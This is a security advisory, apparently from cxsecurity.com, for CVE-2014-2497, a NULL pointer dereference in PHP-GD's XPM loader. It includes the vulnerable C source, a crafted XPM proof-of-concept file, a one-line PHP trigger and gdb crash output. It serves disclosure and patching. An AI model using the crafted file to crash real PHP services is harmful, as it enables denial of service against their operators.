PHP-GD <= v5.4.17-2 c_color NULL pointer dereference

Published
Credit
Risk
2014.03.17
steventhomasseeley
Medium
CWE
CVE
Local
Remote
N/A
CVE-2014-2497
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

Description:
------------
php-gd <= v5.4.17-2 'c_color' NULL pointer dereference

so the bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c:
---------------------------------------------------------------------------------

gdImagePtr gdImageCreateFromXpm (char *filename)
{
XpmInfo info;
XpmImage image;
int i, j, k, number;
char buf[5];
gdImagePtr im = 0;
int *pointer;
int red = 0, green = 0, blue = 0;
int *colors;
int ret;

ret = XpmReadFileToXpmImage(filename, &image, &info);
if (ret != XpmSuccess) {
return 0;
}

if (!(im = gdImageCreate(image.width, image.height))) {
goto done;
}

number = image.ncolors;
colors = (int *) safe_emalloc(number, sizeof(int), 0);
for (i = 0; i < number; i++) {
switch (strlen (image.colorTable[i].c_color)) { // BOOM
--------------------------------------------------------------------------------------------------------

The call to strlen() parses image.colorTable[i].c_color which is initialised as NULL if the particular color mapping
uses a different key (such as monochrome/monovisual).

The xpmColorKeys array stores all avaliable keys and can be found in libXpm:
----------------------------------------------------------------------------
const char *xpmColorKeys[] = {
"s", /* key #1: symbol */
"m", /* key #2: mono visual */
"g4", /* key #3: 4 grays visual */
"g", /* key #4: gray visual */
"c", /* key #5: color visual */
};

The following xpm file will trigger the bug:
--------------------------------------------
/* XPM */
static char * gv_xpm[] = {
"13 13 6 1",
"A c #FFFFFF " /* "0" */,
"B c #CCCCCC " /* "0.0399" */,
"C c #999999 " /* "0.0798" */,
"D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E c #333333 " /* "0.16" */,
"F c #000000 " /* "0.2" */,
/* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",
---------------------------------------------

POC:

php > imagecreatefromxpm("monochome-poc.xpm");

(gdb) p colorTable[0]
$2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"}
(gdb) p colorTable[1]
$3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"}
(gdb) p colorTable[2]
$4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"}
(gdb) p colorTable[3]
$5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0}
(gdb) p colorTable[4]
$6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"}
(gdb) p colorTable[5]
$7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"}
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
39 movdqu (%rdi), %xmm1
(gdb) bt
#0 __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
#1 0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42
#2 0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>,
ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534
#3 0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643
#4 0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410
#5 0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0,
string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197
#6 0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664
#7 0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986
#8 0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364

Test script:
---------------
/* XPM */
static char * gv_xpm[] = {
"13 13 6 1",
"A c #FFFFFF " /* "0" */,
"B c #CCCCCC " /* "0.0399" */,
"C c #999999 " /* "0.0798" */,
"D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E c #333333 " /* "0.16" */,
"F c #000000 " /* "0.2" */,
/* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",

Expected result:
----------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Resource id #4
php >

Actual result:
--------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Segmentation fault (core dumped)

References:

https://bugs.php.net/bug.php?id=66901


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com